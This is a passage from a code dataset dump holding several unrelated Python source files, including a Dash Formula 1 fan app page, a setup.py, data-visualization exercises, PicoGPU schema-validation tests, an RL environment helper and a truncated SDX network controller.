Race(year, event, we.Name.iloc[0])\n elif session == \"sprint\":\n main = Sprint(year, event, we.Format.iloc[0], we.Name.iloc[0])\n else:\n main = \"overall\"\n return html.Div(className=\"main\", children=main)\n\n\ndef overview(year, event, gp):\n with open(path.join(\"data\", 'races_desc.json'), 'r') as f:\n races_info = json.load(f)\n race = races_info[gp.Name.iloc[0]]\n content = []\n content.append(\n html.Div(className=\"we_title\", children=html.H1(children=f\"Round {gp.Round.iloc[0]} : {gp.Name.iloc[0]}\")))\n\n try:\n results = f1.get_race(year, event).results\n content = race_result(content, results)\n except:\n results = 0\n\n track_stats = [\n html.Div(className=\"track_name\", children=race['name']),\n html.Div(className=\"infos\", children=[\n html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"First Grand Prix\"),\n html.P(className=\"stat\", children=race['first_gp'])]),\n html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"Number of Laps\"),\n html.P(className=\"stat\", children=race['nb_laps'])]),\n html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"Circuit Length\"),\n html.P(className=\"stat\", children=race['length'])]),\n html.Div(className=\"info\", children=[html.P(className=\"Label\", children=\"Race Distance\"),\n html.P(className=\"stat\", children=race['race_distance'])]),\n html.Div(className=\"info full\", children=[html.P(className=\"Label\", children=\"Lap Record\"),\n html.P(className=\"stat\", children=[race['lap_record']['time'],\n html.Small(children=\n race['lap_record'][\n 'owner'])])]\n ),\n ])\n ]\n content.append(html.Div(className=\"flex\", children=[html.Div(className=\"box stats\", children=track_stats),\n html.Img(className=\"box circuit\", src=f\"/{race['image']}\")]))\n\n content.append(html.Div(className=\"box built\", children=[html.H1(children=\"When was the track built?\"),\n html.P(children=race[\"built\"].replace('\\u00e2\\u0080\\u0099',\n '’'))]))\n content.append(html.Div(className=\"box story\", children=[html.H1(children=\"When was its first Grand Prix?\"),\n html.P(children=race[\"first_gp-story\"].replace(\n '\\u00e2\\u0080\\u0099', '’'))]))\n content.append(html.Div(className=\"box like\", children=[html.H1(children=\"What’s the circuit like?\"),\n html.P(children=race[\"like\"].replace('\\u00e2\\u0080\\u0099',\n '’'))]))\n content.append(html.Div(className=\"box why\", children=[html.H1(children=\"Why go?\"),\n html.P(children=race[\"why\"].replace('\\u00e2\\u0080\\u0099',\n '’'))]))\n content.append(html.Div(className=\"box where\", children=[html.H1(children=\"Where is the best place to watch?\"),\n html.P(children=race[\"where\"].replace('\\u00e2\\u0080\\u0099',\n '’'))]))\n content.append(html.Div(className=\"box cprights\", children=html.P(children=\"Source : formula1.com\")))\n\n return html.Div(className=\"main overview\", children=content)\n\n\ndef layout(session=None, year=None, event=None, **other):\n gp_data = get_dataframe()\n if year == None or event == None:\n # Map creation\n filtered_data = gp_data[gp_data['Year'] == gp_data['Year'].max()]\n map_fig = make_map(filtered_data)\n\n # Dropdown creation\n year_options = [{'label': str(year), 'value': year} for year in gp_data['Year'].unique()]\n year_dropdown = dcc.Dropdown(\n id='year-dropdown',\n options=year_options,\n value=gp_data['Year'].max()\n )\n return html.Div(className=\"content-map\", children=[\n html.Div(className=\"year\", children=[\n html.Label(\"Choose the year : \"),\n year_dropdown\n ]),\n dcc.Graph(id='map-graph', figure=map_fig,\n config=dict(displayModeBar=False, scrollZoom=False,\n showAxisDragHandles=False, showAxisRangeEntryBoxes=False)),\n dcc.Location(id='url', refresh=True)\n ])\n\n year = int(year)\n event = int(event)\n chosen_gp = gp_data.loc[(gp_data['Year'] == year) & (gp_data[\"Round\"] == event)]\n # Defining page if all variable are set\n if session == \"fp\" or session == \"qualif\" or session == \"race\" or session == \"sprint\":\n # page = content(year, event, session, chosen_gp)\n try:\n page = content(year, event, session, chosen_gp)\n except:\n # TODO : Make it better\n page = html.P(children=\"Sorry there is a problem here\")\n utils.error(f'Something went wrong went trying to display {session} of {chosen_gp.Name.iloc[0]} {year}')\n else:\n page = overview(year, event, chosen_gp)\n if chosen_gp.Format.iloc[0] == \"sprint_shootout\" or chosen_gp.Format.iloc[0] == \"sprint\":\n is_sprint = True\n else:\n is_sprint = False\n if chosen_gp.index == gp_data.index.min():\n first = [True]\n else:\n first = [False,\n f\"{gp_data.loc[chosen_gp.index - 1, 'Year'].iloc[0]}/{gp_data.loc[chosen_gp.index - 1, 'Round'].iloc[0]}\"]\n if chosen_gp.index == gp_data.index.max():\n last = [True]\n else:\n last = [False,\n f\"{gp_data.loc[chosen_gp.index + 1, 'Year'].iloc[0]}/{gp_data.loc[chosen_gp.index + 1, 'Round'].iloc[0]}\"]\n head = header(str(year), str(event), session, is_sprint, first, last)\n return html.Div(className=\"content\", children=[head, page])\n\n\n# Fonction de rappel pour mettre à jour la carte\n@dash.callback(\n dash.dependencies.Output('map-graph', 'figure'),\n [dash.dependencies.Input('year-dropdown', 'value')]\n)\ndef update_map(year):\n gp_data = get_dataframe()\n filtered_data = gp_data[gp_data['Year'] == year]\n map_fig = make_map(filtered_data)\n return map_fig\n\n\n# Fonction de rappel pour la redirection\n@dash.callback(\n dash.dependencies.Output('url', 'pathname'),\n [dash.dependencies.Input('map-graph', 'clickData')])\ndef update_url(clickData):\n if clickData is not None:\n # Récupérer le nom du pays cliqué\n year = clickData['points'][0]['customdata'][0]\n round = clickData['points'][0]['customdata'][1]\n # Mettre à jour l'URL avec le nom du pays\n return f'/grand-prix/{year}/{round}/overview/'\n\n\n@dash.callback(\n [dash.dependencies.Output(\"race-results\", \"className\"), dash.dependencies.Output(\"more-race\", \"src\")],\n dash.dependencies.Input(\"more-race\", \"n_clicks\"),\n [dash.dependencies.State(\"race-results\", \"className\"), dash.dependencies.State(\"more-race\", \"src\")],\n)\ndef toggle_race_results(n_clicks, current_class, current_src):\n if n_clicks is None:\n return current_class, current_src\n if n_clicks % 2 == 1:\n return \"display-all\", \"/assets/images/less.svg\"\n else:\n return \"\", \"/assets/images/more.svg\"\n","repo_name":"RobinGuerard21/AlpineFanApp","sub_path":"pages/grand-prix.py","file_name":"grand-prix.py","file_ext":"py","file_size_in_byte":27474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"5025176636","text":"#!/usr/bin/env python3\n\nimport codecs\nimport os.path\n\nfrom setuptools import find_packages, setup\n\nINSTALL_REQUIRES = [\n \"numpy >= 1.11\",\n \"scipy\",\n \"xarray\",\n \"matplotlib\",\n]\nTESTS_REQUIRE = [\"pytest >= 2.7.1\", \"nitime\"]\n\n\ndef read(rel_path):\n here = os.path.abspath(os.path.dirname(__file__))\n with codecs.open(os.path.join(here, rel_path), \"r\") as fp:\n return fp.read()\n\n\ndef get_version(rel_path):\n for line in read(rel_path).splitlines():\n if line.startswith(\"__version__\"):\n delim = '\"' if '\"' in line else \"'\"\n return line.split(delim)[1]\n else:\n raise RuntimeError(\"Unable to find version string.\")\n\n\nsetup(\n name=\"spectral_connectivity\",\n version=get_version(\"spectral_connectivity/__init__.py\"),\n license=\"GPL-3.0\",\n description=(\n \"Frequency domain functional and directed\"\n \"connectivity analysis tools for electrophysiological\"\n \"data\"\n ),\n author=\"Eric Denovellis\",\n author_email=\"eric.denovellis@ucsf.edu\",\n url=\"https://github.com/Eden-Kramer-Lab/spectral_connectivity\",\n # long_description=open(\"README.md\").read(),\n long_description_content_type=\"text/x-rst\",\n classifiers=[\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Programming Language :: Python\",\n \"Topic :: Scientific/Engineering\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS\",\n \"Programming Language :: Python :: 3\",\n ],\n platforms=\"any\",\n keywords=(\n \"python neuroscience electrophysiology \"\n \"multitaper spectrogram frequency-domain\"\n ),\n python_requires=\">=3\",\n packages=find_packages(),\n install_requires=INSTALL_REQUIRES,\n tests_require=TESTS_REQUIRE,\n project_urls={\n \"Documentation\": \"https://spectral-connectivity.readthedocs.io/en/latest/\",\n \"Bug Reports\": \"https://github.com/Eden-Kramer-Lab/spectral_connectivity/issues\",\n \"Source\": \"https://github.com/Eden-Kramer-Lab/spectral_connectivity\",\n },\n)\n","repo_name":"Eden-Kramer-Lab/spectral_connectivity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"47"} +{"seq_id":"12947780844","text":"vitInter,vitGremio,empates,grenais,a=0,0,0,0,1\nwhile (a==1):\n inter,gremio = input().split()\n grenais += 1\n if a==1:\n if inter >gremio:\n vitInter +=1\n elif inter vitInter:\n print(\"Gremio venceu mais\")\nelif vitGremio == vitInter:\n print(\"Não houve vencedor\")\nelse:\n print(\"Inter venceu mais\")","repo_name":"MatheusA199/beecrowd-puzzle-python","sub_path":"1131-Python.py","file_name":"1131-Python.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1553511126","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 6 12:54:56 2020\n\n@author: haythamomar\n\"\"\"\n\n\n# #- make a new script and call it the section 8 assignment.\n\n# #Please try to answer the questions first and then have a look at the solved script.\n\n\n\n\n\n\n# #2- import twentyeleven.csv ,iris, cars and the requested packages.\n\nimport pandas as pd\nimport seaborn as sns\nimport os \npath = os.getcwd()\nprint(path)\ntwenty= pd.read_csv('{0}/twentyeleven.csv'.format(path))\ncars= pd.read_csv('{0}/cars.csv'.format(path))\niris=pd.read_csv('{0}/iris.csv'.format(path))\n\ntwenty.info()\ntwenty['InvoiceDate']=pd.to_datetime(twenty['InvoiceDate'])\ntwenty['date']= twenty['InvoiceDate'].dt.strftime('%Y-%m-%d')\ntwenty['date']= pd.to_datetime(twenty['date'])\n\n\n\n# 3- Make a line plot of the sales of 2011 for the united kingdom.\n\nuk= twenty[twenty.Country == 'United Kingdom']\n\n\nsales_per_day= uk.groupby('date').agg(total_sales=('Quantity','sum'))\n\nsales_per_day.plot()\n\n\n\n\n# 4- for the next plot; select country countries<-c(\"Canada\",\"Denmark\",\"EIRE\",\"United Kingdom\")\n# make a line plot per each country using plt subplots\n\ncountries=[\"Canada\",\"Denmark\",\"EIRE\",\"United Kingdom\"]\nfour_countries= twenty[twenty.Country.isin(countries)]\n\nsales_per_Day= four_countries.groupby(['Country','date']).agg(total_sales=('Quantity','sum')).reset_index()\n\nsales_pivoted= pd.pivot_table(sales_per_Day,values= 'total_sales',\n columns='Country',index='date',fill_value=0)\n\nsales_pivoted.plot(subplots=True)\n\n\n\n\n\n# 5- Make a scatter plot for cars between price and horsepower.\n\nsns.scatterplot(x= 'Price',y='horsepower',data=cars)\n\n\n\n# 6- Make a distribution plot of sepal length in iris and segregate it by flower.\n\nsetosa= iris[iris.species=='setosa']\nvirginica= iris[iris.species== 'virginica']\nversicolor=iris[iris.species== 'versicolor']\n\nfig=sns.kdeplot(setosa.sepal_length,label='setosa')\nfig=sns.kdeplot(virginica.sepal_length,label='virginica')\nfig=sns.kdeplot(versicolor.sepal_length,label='versicolor')\n\n\n\n# 7- Make a boxplot for the number of cylinders of cars, make sure to take only 4,6 \n#and eight cylinders.\n\ncommon_cylenders= cars[cars.cylenders.isin([4,6,8])]\n\nsns.boxplot(x='cylenders',y='horsepower',data=common_cylenders)\n\n\n\n# 8- make a pairplot of iris dataset segregated by flower type.\n\nsns.pairplot(iris,hue='species')\n\n\n\n\n\n\n","repo_name":"Khixinhxan/datascience_supplychain_practice","sub_path":"Jupyternotebook_source/Section_8_visualization_with_matplotlib_and_seaborn/section_8_assignment (1).py","file_name":"section_8_assignment (1).py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"2469504624","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom hydra import compose, initialize\n\nfrom dataset import make_circles_triple\n\n\ndef plot_cloud(cfg):\n \"\"\"hoge.\"\"\"\n mean, labels = make_circles_triple(\n cfg.training.n_train,\n noise=cfg.dataset.circles_noise,\n random_state=42,\n factors=cfg.dataset.factors,\n )\n fig = plt.figure(figsize=(25, 4))\n axes = [None, None, None, None, None]\n axes[0] = fig.add_subplot(1, 5, 1)\n for lab in [2, 1, 0]:\n idx = np.where(labels == lab)[0]\n axes[0].scatter(mean[idx, 0], mean[idx, 1], s=1)\n\n rng = np.random.default_rng(seed=0)\n point_list = [\n mean[i]\n + np.sqrt(cfg.dataset.gauss_cov)\n * rng.standard_normal(size=(cfg.training.n_points, 2))\n for i in range(cfg.training.n_train)\n ]\n points = np.concatenate(point_list, axis=0)\n labels = np.repeat(labels, cfg.training.n_points)\n color_list = [\"C2\", \"C1\", \"C0\"]\n for i in range(3):\n axes[i + 1] = fig.add_subplot(1, 5, i + 2)\n idx = np.where(labels == i)[0]\n axes[i + 1].scatter(points[idx, 0], points[idx, 1], s=1, color=color_list[i])\n axes[i + 1].set_xlim(-2.2, 2.2)\n axes[i + 1].set_ylim(-2.2, 2.2)\n axes[4] = fig.add_subplot(1, 5, 5)\n for lab in [2, 1, 0]:\n idx = np.where(labels == lab)[0]\n axes[4].scatter(points[idx, 0], points[idx, 1], s=1)\n fig.tight_layout()\n image_dir = os.path.join(cfg.directory.root_dir, cfg.directory.image_dir)\n os.makedirs(image_dir, exist_ok=True)\n plt.savefig(os.path.join(image_dir, cfg.inference.dataset_fig_file))\n plt.show()\n\n\nif __name__ == \"__main__\":\n with initialize(version_base=None, config_path=\".\"):\n config = compose(config_name=\"config\")\n plot_cloud(config)\n","repo_name":"tam17aki/deep_divergence_practice","sub_path":"clustering/gaussian/plot_dataset.py","file_name":"plot_dataset.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"11977503307","text":"from picongpu.pypicongpu.rendering import RenderedObject\n\nimport unittest\nimport typeguard\nfrom picongpu.pypicongpu.solver import YeeSolver\nfrom picongpu.pypicongpu import Simulation\nimport jsonschema\n\n\nclass TestRenderedObject(unittest.TestCase):\n def schema_store_init(self):\n RenderedObject._schemas_loaded = False\n RenderedObject._maybe_fill_schema_store()\n\n def schema_store_reset(self):\n RenderedObject._schemas_loaded = False\n RenderedObject._schema_by_uri = {}\n\n def setUp(self):\n self.schema_store_reset()\n # if required test case can additionally init the schema store\n\n def test_basic(self):\n \"\"\"simple example using real-world example\"\"\"\n yee = YeeSolver()\n self.assertTrue(isinstance(yee, RenderedObject))\n self.assertNotEqual(\n {}, RenderedObject._get_schema_from_class(type(yee)))\n # no throw -> schema found\n self.assertEqual(yee.get_rendering_context(),\n yee._get_serialized())\n\n # manually check that schema has been loaded\n fqn = RenderedObject._get_fully_qualified_class_name(type(yee))\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n self.assertTrue(uri in RenderedObject._schema_by_uri)\n\n def test_not_implemented(self):\n \"\"\"raises if _get_serialized() is not implemented\"\"\"\n class EmptyClass(RenderedObject):\n pass\n\n with self.assertRaises(NotImplementedError):\n e = EmptyClass()\n e.get_rendering_context()\n\n def test_no_schema(self):\n \"\"\"not finding a schema raises\"\"\"\n class HasNoSchema(RenderedObject):\n def _get_serialized(self):\n return {\"any\": \"thing\"}\n\n with self.assertRaisesRegex(RuntimeError, \".*[Ss]chema.*\"):\n h = HasNoSchema()\n h.get_rendering_context()\n\n def test_schema_validation_and_passthru(self):\n \"\"\"schema is properly validated (and passed through)\"\"\"\n self.schema_store_init()\n\n class MaybeValid(RenderedObject):\n be_valid = False\n\n def _get_serialized(self):\n if self.be_valid:\n return {\"my_string\": \"ja\", \"num\": 17}\n return {\"my_string\": \"\"}\n\n fqn = RenderedObject._get_fully_qualified_class_name(MaybeValid)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n RenderedObject._schema_by_uri[uri] = {\n \"properties\": {\n \"my_string\": {\"type\": \"string\"},\n \"num\": {\"type\": \"number\"},\n },\n \"required\": [\"my_string\", \"num\"],\n \"unevaluatedProperties\": False,\n }\n\n # all okay\n maybe_valid = MaybeValid()\n maybe_valid.be_valid = True\n self.assertNotEqual({}, maybe_valid.get_rendering_context())\n\n maybe_valid.be_valid = False\n with self.assertRaisesRegex(Exception, \".*[Ss]chema.*\"):\n maybe_valid.get_rendering_context()\n\n def test_invalid_schema(self):\n \"\"\"schema itself is broken -> creates error\"\"\"\n self.schema_store_init()\n\n class HasInvalidSchema(RenderedObject):\n def _get_serialized(self):\n return {\"any\": \"thing\"}\n\n fqn = RenderedObject._get_fully_qualified_class_name(HasInvalidSchema)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n # note: this is very evil injection, do not *ever* do this\n RenderedObject._schema_by_uri[uri] = {\n \"type\": \"invalid_type_HJJE$L!BGCDHS\",\n }\n\n h = HasInvalidSchema()\n with self.assertRaisesRegex(Exception, \".*[Ss]chema.*\"):\n h.get_rendering_context()\n\n def test_schema_should_forbid_unevaluated_properties(self):\n \"\"\"warn if schema allows unevaluated properties\"\"\"\n self.schema_store_init()\n\n class HasPermissiveSchema(RenderedObject):\n def _get_serialized(self):\n return {\"any\": \"thing\"}\n fqn = RenderedObject._get_fully_qualified_class_name(\n HasPermissiveSchema)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n\n # schema \"{}\" is considered too permissive\n RenderedObject._schema_by_uri[uri] = {}\n\n permissive = HasPermissiveSchema()\n with self.assertLogs(level=\"WARNING\") as caught_logs:\n # valid, but warns\n self.assertNotEqual({}, permissive.get_rendering_context())\n self.assertEqual(1, len(caught_logs.output))\n\n def test_fully_qualified_classname(self):\n \"\"\"fully qualified classname is correctly generated\"\"\"\n # concept: define two classes of same name\n # FQN (fully qualified name) must contain their names\n # but both FQNs must be not equal\n\n def obj1():\n class MyClass:\n pass\n return MyClass\n\n def obj2():\n class MyClass:\n pass\n return MyClass\n\n t1 = obj1()\n t2 = obj2()\n # both are not equal\n self.assertNotEqual(t1, t2)\n # ... but type equality still works (sanity check)\n self.assertNotEqual(t1, obj1())\n\n fqn1 = RenderedObject._get_fully_qualified_class_name(t1)\n fqn2 = RenderedObject._get_fully_qualified_class_name(t2)\n\n # -> \"MyClass\" is contained in FQN\n self.assertTrue(\"MyClass\" in fqn1)\n self.assertTrue(\"MyClass\" in fqn2)\n # ... but they are not the same\n self.assertNotEqual(fqn1, fqn2)\n\n def test_schema_optional(self):\n \"\"\"schema may define optional parameters\"\"\"\n self.schema_store_init()\n\n class MayReturnNone(RenderedObject):\n toreturn = None\n\n def _get_serialized(self):\n return {\"value\": self.toreturn}\n\n fqn = RenderedObject._get_fully_qualified_class_name(MayReturnNone)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n RenderedObject._schema_by_uri[uri] = {\n \"type\": \"object\",\n \"properties\": {\n \"value\": {\n \"anyOf\": [\n {\n \"type\": \"null\",\n },\n {\n \"type\": \"object\",\n \"properties\": {\n \"mandatory\": {\n \"type\": \"number\",\n \"exclusiveMinimum\": 0,\n },\n },\n \"required\": [\"mandatory\"],\n \"unevaluatedProperties\": False,\n },\n ],\n },\n },\n \"required\": [\"value\"],\n \"unevaluatedProperties\": False,\n }\n\n # ok:\n mrn = MayReturnNone()\n mrn.toreturn = None\n self.assertEqual({\"value\": None}, mrn.get_rendering_context())\n mrn.toreturn = {\"mandatory\": 2}\n self.assertEqual({\"value\": {\"mandatory\": 2}},\n mrn.get_rendering_context())\n\n for invalid in [{\"mandatory\": 0}, {}, \"\", []]:\n with self.assertRaises(Exception):\n mrn = MayReturnNone()\n mrn.toreturn = invalid\n mrn.get_rendering_context()\n\n def test_check_context(self):\n \"\"\"context check can be used manually\"\"\"\n yee = YeeSolver()\n context_correct = yee.get_rendering_context()\n context_incorrect = {}\n\n # must load schemas if required -> reset schema store\n self.schema_store_reset()\n self.assertTrue(not RenderedObject._schemas_loaded)\n\n # (A) context is correctly checked against the given type\n # passes:\n RenderedObject.check_context_for_type(YeeSolver, context_correct)\n\n # implicitly filled schema store\n self.assertTrue(RenderedObject._schemas_loaded)\n\n # same context is not valid for simulation object\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n RenderedObject.check_context_for_type(Simulation, context_correct)\n\n # incorrect context not accepted for YeeSolver\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n RenderedObject.check_context_for_type(YeeSolver, context_incorrect)\n\n # (B) invalid requests are rejected\n # wrong argument types\n with self.assertRaises(typeguard.TypeCheckError):\n RenderedObject.check_context_for_type(\"YeeSolver\", context_correct)\n with self.assertRaises(typeguard.TypeCheckError):\n RenderedObject.check_context_for_type(YeeSolver, \"{}\")\n\n # types without schema\n class HasNoValidation:\n # note: don't use \"Schema\" to not accidentally trigger the regex\n # for the error message below\n # note: does not have to inherit from RenderedObject\n pass\n\n with self.assertRaisesRegex(RuntimeError, \".*[Ss]chema.*\"):\n RenderedObject.check_context_for_type(HasNoValidation, {})\n\n def test_irregular_schema(self):\n \"\"\"non-object (but valid) schemas are accepted\"\"\"\n self.schema_store_init()\n\n class SimpleObject(RenderedObject):\n def _get_serialized(self):\n return {}\n\n fqn = RenderedObject._get_fully_qualified_class_name(SimpleObject)\n uri = RenderedObject._get_schema_uri_by_fully_qualified_class_name(fqn)\n # the schema \"false\" is a valid schema; it rejects all inputs\n RenderedObject._schema_by_uri[uri] = False\n\n # there must be an error during validation & a warning issued\n with self.assertLogs(level=\"WARNING\") as caught_logs_rejected:\n with self.assertRaises(jsonschema.exceptions.ValidationError):\n SimpleObject().get_rendering_context()\n self.assertEqual(1, len(caught_logs_rejected.output))\n\n # reverse: now must be accepted -- but warning still issued!\n RenderedObject._schema_by_uri[uri] = True\n with self.assertLogs(level=\"WARNING\") as caught_logs_accepted:\n SimpleObject().get_rendering_context()\n self.assertEqual(1, len(caught_logs_accepted.output))\n","repo_name":"ComputationalRadiationPhysics/picongpu","sub_path":"test/python/picongpu/quick/pypicongpu/rendering/renderedobject.py","file_name":"renderedobject.py","file_ext":"py","file_size_in_byte":10377,"program_lang":"python","lang":"en","doc_type":"code","stars":652,"dataset":"github-code","pt":"47"} +{"seq_id":"39365770587","text":"import numpy as np\nimport tensorflow as tf\nimport datetime\nimport json\n\n# Different profiles combining resolutions and bitrate\nPROFILES = {1: {1080: 50}, 2: {1080: 30}, 3: {1080: 20}, 4: {1080: 15}, 5: {1080: 10}, 6: {1080: 5}, 7: {720: 25},\n 8: {720: 15}, 9: {720: 10}, 10: {720: 7.5}, 11: {720: 5}, 12: {720: 2.5}}\n\nRANDOM_SEED = 42\nGAMMA = 0.99\n\n\nclass Environment:\n def __init__(self):\n\n np.random.seed(RANDOM_SEED)\n\n\ndef model_summary():\n td_loss = tf.Variable(0.)\n tf.summary.scalar(\"TD_Loss\", td_loss)\n total_reward = tf.Variable(0.)\n tf.summary.scalar(\"Total_Reward\", total_reward)\n avg_entropy = tf.Variable(0.)\n tf.summary.scalar(\"Average_Entropy\", avg_entropy)\n\n model_vars = [td_loss, total_reward, avg_entropy]\n model_ops = tf.summary.merge_all()\n\n return model_vars, model_ops\n\n\ndef compute_gradients(states_matrix, actions_matrix, rewards_matrix, actor_net, critic_net):\n assert states_matrix.shape[0] == actions_matrix.shape[0]\n assert states_matrix.shape[0] == rewards_matrix.shape[0]\n\n ba_size = states_matrix.shape[0]\n\n v_matrix = critic_net.predict(states_matrix)\n\n r_matrix = np.zeros(rewards_matrix.shape)\n\n # if terminal:\n # r_matrix[-1, 0] = 0 # terminal state\n # else:\n # r_matrix[-1, 0] = v_matrix[-1, 0] # boot strap from last state\n\n for t in reversed(range(ba_size - 1)):\n r_matrix[t, 0] = rewards_matrix[t] + GAMMA * r_matrix[t + 1, 0]\n\n td_matrix = r_matrix - v_matrix\n\n actor_gradients = actor_net.get_gradients(states_matrix, actions_matrix, td_matrix)\n critic_gradients = critic_net.get_gradients(states_matrix, r_matrix)\n\n return actor_gradients, critic_gradients, td_matrix\n\n\ndef compute_entropy(info):\n entropy = 0.0\n for i in range(len(info)):\n if 0 < info[i] < 1:\n entropy -= info[i] * np.log(info[i])\n return entropy\n\n\ndef consume_kafka(consumer):\n\n for message in consumer:\n content = message.value\n\n resolution = content['value']['resolution']\n frame_rate = content['value']['frame_rate']\n bitrate = content['value']['bitrate']\n duration = content['value']['duration']\n mos = content['value']['mos']\n timestamp = content['timestamp']\n break\n\n return resolution, frame_rate, bitrate, duration, mos, timestamp\n","repo_name":"Kaiser-14/DRL_QoE_A2C","sub_path":"environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42561829527","text":"#!/usr/bin/env python\n# Author:\n# Rudiger Birkner (Networked Systems Group ETH Zurich)\n\nimport os\nimport argparse\n\nimport logging\nfrom threading import Thread\nfrom config import Config\nfrom lib import XCTRLEvent\n\nfrom multiprocessing import Queue\nfrom Queue import Empty\n\nfrom arp_proxy.arp_proxy import ARPProxy\nfrom route_server.route_server import RouteServer\nfrom vmac_encoder.supersets import SuperSetEncoder\nfrom loop_detection.loop_detector import LoopDetector\nfrom policies.policies import PolicyHandler\n\n\nclass XCTRL(object):\n def __init__(self,\n sdx_id,\n base_path,\n config_file,\n debug,\n test,\n no_superset,\n rib_timing,\n policy_timing,\n notification_timing,\n no_notifications):\n\n self.logger = logging.getLogger(\"XCTRL\")\n self.debug = debug\n self.test = test\n self.no_notifications = no_notifications\n self.no_superset = no_superset\n\n self.rib_timing = rib_timing\n self.policy_timing = policy_timing\n self.notification_timing = notification_timing\n if self.debug:\n self.logger.setLevel(logging.DEBUG)\n self.logger.info('init')\n\n # Parse Config\n self.config = Config(sdx_id, base_path, config_file)\n\n # Event Queue\n self.event_queue = Queue()\n\n self.run = False\n\n if self.test:\n self.thread_modules = [\"route_server\", \"loop_detection\", \"policy_handler\"]\n else:\n self.thread_modules = [\"route_server\", \"loop_detection\", \"policy_handler\", \"arp_proxy\"]\n\n self.modules = dict()\n self.threads = dict()\n\n def start(self):\n # Start all modules\n # route server\n self.modules[\"route_server\"] = RouteServer(self.config, self.event_queue, self.debug, self.test)\n\n # loop detection - needs access to RIB\n self.modules[\"loop_detection\"] = LoopDetector(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"route_server\"].rib,\n None,\n self.test,\n self.no_notifications,\n self.rib_timing,\n self.notification_timing)\n\n # VMAC encoder - needs access to RIB, CIB\n self.modules[\"vmac_encoder\"] = SuperSetEncoder(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"route_server\"].rib,\n self.modules[\"loop_detection\"].forbidden_paths,\n self.test)\n\n # policies - needs access to Correctness, VMAC encoder\n self.modules[\"policy_handler\"] = PolicyHandler(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"vmac_encoder\"],\n self.modules[\"loop_detection\"],\n self.test,\n self.policy_timing)\n\n self.modules[\"loop_detection\"].policy_handler = self.modules[\"policy_handler\"]\n\n # arp proxy - needs access to VMAC encoder\n self.modules[\"arp_proxy\"] = ARPProxy(self.config,\n self.event_queue,\n self.debug,\n self.modules[\"vmac_encoder\"],\n self.test)\n\n for name in self.thread_modules:\n if self.modules[name]:\n self.threads[name] = Thread(target=self.modules[name].start)\n self.threads[name].daemon = True\n self.threads[name].start()\n\n # Process all incoming events\n self.run = True\n while self.run:\n try:\n event = self.event_queue.get(True, 1)\n\n except Empty:\n #self.logger.debug('Event Queue Empty')\n continue\n\n if isinstance(event, XCTRLEvent):\n if event.type == \"RIB UPDATE\":\n\n # update vnh assignment\n self.modules[\"vmac_encoder\"].vnh_assignment(event.data)\n\n # update supersets\n sdx_messages = self.modules[\"vmac_encoder\"].update_supersets(event.data)\n\n # update policies if supersets changed\n if sdx_messages[\"type\"] == \"new\":\n # policy module\n self.modules[\"policy_handler\"].update_policies()\n\n # loop detection\n self.modules[\"loop_detection\"].rib_update(event.data)\n\n # notify all participants about the RIB changes\n changes = self.modules[\"route_server\"].update_neighbors(event.data)\n\n # Renew ARP\n for change in changes:\n self.modules[\"arp_proxy\"].send_gratuitous_arp(change)\n\n elif event.type == \"FORBIDDEN PATHS UPDATE\":\n # Renew ARP\n for change in changes:\n self.modules[\"arp_proxy\"].send_gratuitous_arp(change)\n\n def stop(self):\n self.run = False\n\n # Stop all Modules and Join all Threads\n for name in self.thread_modules:\n if self.modules[name]:\n self.modules[name].stop()\n\n for thread in self.threads.values():\n thread.join()\n\n\ndef main(argv):\n # logging - log level\n logging.basicConfig(level=logging.INFO)\n\n # locate config file\n base_path = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\", \"examples\",\n argv.dir))\n config_file = os.path.join(base_path, \"global.cfg\")\n\n # start route server\n xctrl_instance = XCTRL(int(argv.sdxid),\n base_path,\n config_file,\n argv.debug,\n argv.test,\n argv.nosuperset,\n argv.ribtiming,\n argv.policytiming,\n argv.notificationtiming,\n argv.nonotifications)\n xctrl_thread = Thread(target=xctrl_instance.start)\n xctrl_thread.start()\n\n while xctrl_thread.is_alive():\n try:\n xctrl_thread.join(1)\n except KeyboardInterrupt:\n xctrl_instance.stop()\n\n''' main '''\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', help='the directory of the example')\n parser.add_argument('sdxid', help='SDX identifier')\n parser.add_argument('-d', '--debug', help='enable debug output', action='store_true')\n parser.add_argument('-t', '--test', help='test mode', action='store_true')\n parser.add_argument('-ns', '--nosuperset', help='deactivate superset computation', action='store_true')\n parser.add_argument('-nn', '--nonotifications', help='no notifications', 